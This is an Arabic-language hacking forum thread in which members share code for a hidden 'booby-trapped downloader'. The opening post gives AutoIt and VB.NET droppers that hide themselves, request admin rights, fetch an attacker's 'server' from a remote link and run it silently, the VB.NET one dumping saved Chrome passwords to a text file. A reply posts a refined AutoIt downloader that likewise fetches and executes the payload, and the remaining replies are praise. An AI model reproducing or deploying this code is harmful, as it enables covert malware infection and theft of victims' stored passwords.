1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : سكيورتي ارهابي | المشاهدات : 1,358 | الردود : 11
حالة الموضوع:
مغلق
  1. سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    701
    الإعجابات المتلقاة:
    48
    نقاط الجائزة:
    75
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    السلام عليكم ورحمه الله وبركاته شلونكم اعضاء عراق تيم

    انشاء الله بخير اليوم موضوعنا جدا بسيــط راح يتكلم عن كيفيه


    عمل تلغيمه داونلودر الشرح جدا سهل فقط راح تحتاج كود مع موقع لرفع


    رابط سيرفرك مباشر اترككم مع الشرح

    https://www.youtube.com/watch?v=5DwOV-6Dc9s


    الكود المستخدم
    -------- #NoTrayIcon
    #RequireAdmin
    Break ( 0 )
    $a = "رابط مباشر للسيرفر"
    $b = @WindowsDir
    $c = "\server.com"
    InetGet($a,$b & $c)
    run($b & $c)
    Exit
    ----------- او اما تريد تستخدم
    بل دوت نت
    -------
    [FONT=arial, sans-serif] Me.Hide()[/FONT]
    [FONT=arial, sans-serif] Me.ShowInTaskbar = False[/FONT]
    [FONT=arial, sans-serif] Me.ShowIcon = False[/FONT]
    [FONT=arial, sans-serif] Dim WaitRunningProcess As System.Diagnostics.Process = Process.GetProcessesByName("Noura Hexor v1.0")(0)[/FONT]
    [FONT=arial, sans-serif] WaitRunningProcess.WaitForExit()[/FONT]
    [FONT=arial, sans-serif] Dim wc As New Net.WebClient[/FONT]
    [FONT=arial, sans-serif] wc.DownloadFile("رابط المباشر لسيرفر ", Environ("tmp") & "\Server.exe")[/FONT]
    [FONT=arial, sans-serif] Shell(Environ("tmp") & "\Server.exe /stext " & Environ("tmp") & "\ChromePass.txt", AppWinStyle.Hide)[/FONT]
    [FONT=arial, sans-serif]
    [/FONT]

    [FONT=arial, sans-serif]اتمنى لكم الموفيقه [/FONT]
    [FONT=arial, sans-serif]تحياتي لكم[/FONT]:{17}:
     
  2. مستر كولدن DeveloPer Plus

    الأنتساب:
    ‏4 ديسمبر 2014
    المشاركات:
    224
    الإعجابات المتلقاة:
    288
    نقاط الجائزة:
    155
    الجنس:
    ذكر
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    رد: عمل تلغيمه داونلودر بأحتراف

    جميل عاااشت ايدك يابطل
     
  3. سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    701
    الإعجابات المتلقاة:
    48
    نقاط الجائزة:
    75
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: عمل تلغيمه داونلودر بأحتراف

    وايدك حياتي كولدن نورت
     
  4. rebih Developer

    الأنتساب:
    ‏11 مايو 2014
    المشاركات:
    91
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    windows xp
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: عمل تلغيمه داونلودر بأحتراف

    مشكووور بطل لاتحرمنا من جديدك
     
  5. علاوي نستلة موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 فبراير 2015
    المشاركات:
    69
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الوظيفة:
    اقرة حتة انجح من السادس العلمي وارتاأح
    الإقامة:
    الـــعــــراأق األـــعـــظــــيـــم
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Delphi
    رد: عمل تلغيمه داونلودر بأحتراف

    اول شغلة اسمهة داولودر مو داونلودر

    وثاني شغلة السورس الأول اوتوايت وبي نقص يعني لازم تعوض المتغيرات الي انتة فارضهن

    انصحك بأستخدام هذا الكواد الي هوة من برمجتي المتواضعة ومميزاتة فد شي اقرة السورس واحكم انت {2$0}

    #RequireAdmin
    #NoTrayIcon
    Global Const $sdownloadlink = "خلي هناا الرابط مال الكعبة مباشر"
    Global Const $ssavepath = @TempDir & "هناا اسم السيرفر"
    Local $downloadfile = InetGet($sdownloadlink, $ssavepath, 1, 1)
    Do

    Until InetGetInfo($downloadfile, 2)
    If FileExists($ssavepath) Then
    If FileGetSize($ssavepath) = InetGetSize($sdownloadlink) Then
    ShellExecute($ssavepath)
    EndIf
    EndIf

    وفي الختام تقبل مروري اخي الغالي :{1!}:
     
  6. Janet CHaldean مشرفه أقسام التصميم والجرافيكس V • I • P

    الأنتساب:
    ‏5 يناير 2015
    المشاركات:
    538
    الإعجابات المتلقاة:
    1,238
    نقاط الجائزة:
    515
    الجنس:
    أنثى
    الوظيفة:
    Diplomacy
    الإقامة:
    Kingdom of Norway
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: عمل تلغيمه داونلودر بأحتراف

    عاشت الايادي
     
  7. آرْ بْيْ جْيْ ڪْرْڪْوْڪْ DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2015
    المشاركات:
    147
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    Visual Basic
    رد: عمل تلغيمه داونلودر بأحتراف

    عاشت ايدك حبي روعه
     
  8. ♕| м α s к о и |♕ موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    1
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    15
    الوظيفة:
    مـصـور فـوتوغرآفي
    الإقامة:
    بــغــدآد
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
  9. Security ALqassem قراصنة القاسم Developer

    الأنتساب:
    ‏7 سبتمبر 2015
    المشاركات:
    134
    الإعجابات المتلقاة:
    36
    نقاط الجائزة:
    75
    الجنس:
    ذكر
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    رد: عمل تلغيمه داونلودر بأحتراف

    عاشت ايدك اخوي
     
  10. ♕| м α s к о и |♕ موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    1
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    15
    الوظيفة:
    مـصـور فـوتوغرآفي
    الإقامة:
    بــغــدآد
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: عمل تلغيمه داونلودر بأحتراف

    مكرر لاكـن شكرآ على تعبك #
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة